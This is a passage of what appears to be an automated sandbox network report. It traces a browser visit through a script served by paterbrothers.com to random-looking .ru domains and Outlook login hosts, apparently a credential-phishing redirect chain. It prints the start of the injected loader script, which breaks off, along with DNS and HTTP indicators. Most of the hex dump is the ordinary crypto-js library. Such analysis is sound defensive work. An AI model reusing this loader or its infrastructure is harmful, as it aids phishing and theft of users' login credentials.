                                                                                                        Dec 18, 2024 23:16:51.337707996 CET1.1.1.1192.168.2.40x2ef2No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:51.337707996 CET1.1.1.1192.168.2.40x2ef2No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:51.339870930 CET1.1.1.1192.168.2.40x7530No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:55.777962923 CET1.1.1.1192.168.2.40x3844No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:12.456027985 CET1.1.1.1192.168.2.40x6edcNo error (0)yxsicvivg3tcc8edzvkpxgggf99tcczt03g9ruo9nniufbnqvah0oovv.uyofiykrxf.ru104.21.18.132A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:12.456027985 CET1.1.1.1192.168.2.40x6edcNo error (0)yxsicvivg3tcc8edzvkpxgggf99tcczt03g9ruo9nniufbnqvah0oovv.uyofiykrxf.ru172.67.181.220A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:12.456489086 CET1.1.1.1192.168.2.40xba1fNo error (0)yxsicvivg3tcc8edzvkpxgggf99tcczt03g9ruo9nniufbnqvah0oovv.uyofiykrxf.ru65IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:16.023613930 CET1.1.1.1192.168.2.40x5fd6No error (0)yxsicvivg3tcc8edzvkpxgggf99tcczt03g9ruo9nniufbnqvah0oovv.uyofiykrxf.ru104.21.18.132A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:16.023613930 CET1.1.1.1192.168.2.40x5fd6No error (0)yxsicvivg3tcc8edzvkpxgggf99tcczt03g9ruo9nniufbnqvah0oovv.uyofiykrxf.ru172.67.181.220A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:16.024988890 CET1.1.1.1192.168.2.40xcb8No error (0)yxsicvivg3tcc8edzvkpxgggf99tcczt03g9ruo9nniufbnqvah0oovv.uyofiykrxf.ru65IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:16.027050018 CET1.1.1.1192.168.2.40x3cd9No error (0)www.outlook.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:16.027050018 CET1.1.1.1192.168.2.40x3cd9No error (0)outlook.office365.comooc-g2.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:16.027050018 CET1.1.1.1192.168.2.40x3cd9No error (0)ooc-g2.tm-4.office.com40.99.70.226A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:16.027050018 CET1.1.1.1192.168.2.40x3cd9No error (0)ooc-g2.tm-4.office.com52.98.32.2A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:16.027050018 CET1.1.1.1192.168.2.40x3cd9No error (0)ooc-g2.tm-4.office.com52.98.95.210A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:16.027050018 CET1.1.1.1192.168.2.40x3cd9No error (0)ooc-g2.tm-4.office.com40.99.68.34A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:16.027050018 CET1.1.1.1192.168.2.40x3cd9No error (0)ooc-g2.tm-4.office.com40.99.70.194A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:16.027050018 CET1.1.1.1192.168.2.40x3cd9No error (0)ooc-g2.tm-4.office.com52.98.61.50A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:16.027050018 CET1.1.1.1192.168.2.40x3cd9No error (0)ooc-g2.tm-4.office.com52.98.61.34A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:16.027050018 CET1.1.1.1192.168.2.40x3cd9No error (0)ooc-g2.tm-4.office.com40.99.60.2A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:16.284852028 CET1.1.1.1192.168.2.40x88acNo error (0)www.outlook.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:16.284852028 CET1.1.1.1192.168.2.40x88acNo error (0)outlook.office365.comooc-g2.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:18.849680901 CET1.1.1.1192.168.2.40xd2c2No error (0)outlook.live.comolc-g2.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:18.849719048 CET1.1.1.1192.168.2.40x743aNo error (0)outlook.live.comolc-g2.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:18.849719048 CET1.1.1.1192.168.2.40x743aNo error (0)olc-g2.tm-4.office.com40.99.32.114A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:18.849719048 CET1.1.1.1192.168.2.40x743aNo error (0)olc-g2.tm-4.office.com40.99.70.226A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:18.849719048 CET1.1.1.1192.168.2.40x743aNo error (0)olc-g2.tm-4.office.com52.98.32.2A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:18.849719048 CET1.1.1.1192.168.2.40x743aNo error (0)olc-g2.tm-4.office.com52.98.61.34A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:18.849719048 CET1.1.1.1192.168.2.40x743aNo error (0)olc-g2.tm-4.office.com40.99.60.2A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:18.849719048 CET1.1.1.1192.168.2.40x743aNo error (0)olc-g2.tm-4.office.com40.99.68.34A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:18.849719048 CET1.1.1.1192.168.2.40x743aNo error (0)olc-g2.tm-4.office.com40.99.70.194A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:18.849719048 CET1.1.1.1192.168.2.40x743aNo error (0)olc-g2.tm-4.office.com40.99.70.178A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:27.347645044 CET1.1.1.1192.168.2.40x1bbNo error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:27.347817898 CET1.1.1.1192.168.2.40xfa49No error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:27.611355066 CET1.1.1.1192.168.2.40xdca5No error (0)assets.onestore.msassets.onestore.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:27.665158987 CET1.1.1.1192.168.2.40x25efNo error (0)assets.onestore.msassets.onestore.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:30.231560946 CET1.1.1.1192.168.2.40x380eNo error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:30.237725019 CET1.1.1.1192.168.2.40x80abNo error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:31.260910988 CET1.1.1.1192.168.2.40x7fc6No error (0)c.s-microsoft.comc-s.cms.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:31.337198973 CET1.1.1.1192.168.2.40x9468No error (0)c.s-microsoft.comc-s.cms.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:33.955307961 CET1.1.1.1192.168.2.40x609fNo error (0)c.s-microsoft.comc-s.cms.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:33.955533981 CET1.1.1.1192.168.2.40xda09No error (0)c.s-microsoft.comc-s.cms.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        • paterbrothers.com
                                                                                                        • cdnjs.cloudflare.com
                                                                                                        • d7m.kczcylvjubu.ru
                                                                                                        • https:
                                                                                                          • challenges.cloudflare.com
                                                                                                          • code.jquery.com
                                                                                                          • yxsicvivg3tcc8edzvkpxgggf99tcczt03g9ruo9nniufbnqvah0oovv.uyofiykrxf.ru
                                                                                                          • www.outlook.com
                                                                                                          • outlook.live.com
                                                                                                        • a.nel.cloudflare.com
                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.44973469.49.245.1724432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 22:16:40 UTC662OUTGET /res444.php?2-68747470733a2f2f44374d2e6b637a63796c766a7562752e72752f784a456f6233562f-butterbur HTTP/1.1
                                                                                                        Host: paterbrothers.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: script
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 22:16:40 UTC196INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 22:16:39 GMT
                                                                                                        Server: Apache
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Connection: close
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Content-Type: text/javascript;charset=UTF-8
                                                                                                        2024-12-18 22:16:40 UTC1995INData Raw: 37 62 66 0d 0a 20 20 20 20 76 61 72 20 6c 63 47 74 6c 64 4e 50 62 6d 54 76 4a 58 63 59 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 6c 63 47 74 6c 64 4e 50 62 6d 54 76 4a 58 63 59 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 6c 63 47 74 6c 64 4e 50 62 6d 54 76 4a 58 63 59 29 3b 0d 0a 6c 63 47 74 6c 64 4e 50 62 6d 54 76 4a 58 63 59 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                        Data Ascii: 7bf var lcGtldNPbmTvJXcY = document.createElement("script");lcGtldNPbmTvJXcY.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(lcGtldNPbmTvJXcY);lcGtldNPbmTvJXcY.onload=function()


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.449737104.17.24.144432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 22:16:42 UTC526OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                                                        Host: cdnjs.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: script
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 22:16:42 UTC960INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 22:16:42 GMT
                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Cache-Control: public, max-age=30672000
                                                                                                        ETag: W/"5eb03e2d-bb78"
                                                                                                        Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                                        cf-cdnjs-via: cfworker/kv
                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                        Timing-Allow-Origin: *
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        CF-Cache-Status: HIT
                                                                                                        Age: 212614
                                                                                                        Expires: Mon, 08 Dec 2025 22:16:42 GMT
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0OsuLQYgBVpnY%2BWyw2sHjn0Gk90QdsyM5NxSecL6ODw1eqdCZdOgDMrQGi8GC9DDSpulhUlo%2F6cfco5KM8p6FT%2BC1%2BpEgVFJzTbp5AX4nszlgZP1AytNDzG6YEFmGah40QDUEMjV"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                        Strict-Transport-Security: max-age=15780000
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f4284d138db1a17-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2024-12-18 22:16:42 UTC409INData Raw: 37 62 66 31 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                                                        Data Ascii: 7bf1!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                                                        2024-12-18 22:16:42 UTC1369INData Raw: 74 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f
                                                                                                        Data Ascii: t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeo
                                                                                                        2024-12-18 22:16:42 UTC1369INData Raw: 3d 30 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63
                                                                                                        Data Ascii: =0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:func
                                                                                                        2024-12-18 22:16:42 UTC1369INData Raw: 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63
                                                                                                        Data Ascii: (t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProc
                                                                                                        2024-12-18 22:16:42 UTC1369INData Raw: 3d 3d 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e 3e 30
                                                                                                        Data Ascii: ===i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>>0
                                                                                                        2024-12-18 22:16:42 UTC1369INData Raw: 28 65 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30
                                                                                                        Data Ascii: (e[4]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)*i|0
                                                                                                        2024-12-18 22:16:42 UTC1369INData Raw: 2d 6f 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34 39 36
                                                                                                        Data Ascii: -o%4*2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=429496
                                                                                                        2024-12-18 22:16:42 UTC1369INData Raw: 41 28 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38 5d 29
                                                                                                        Data Ascii: A(S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38])
                                                                                                        2024-12-18 22:16:42 UTC1369INData Raw: 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c
                                                                                                        Data Ascii: one.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(c<
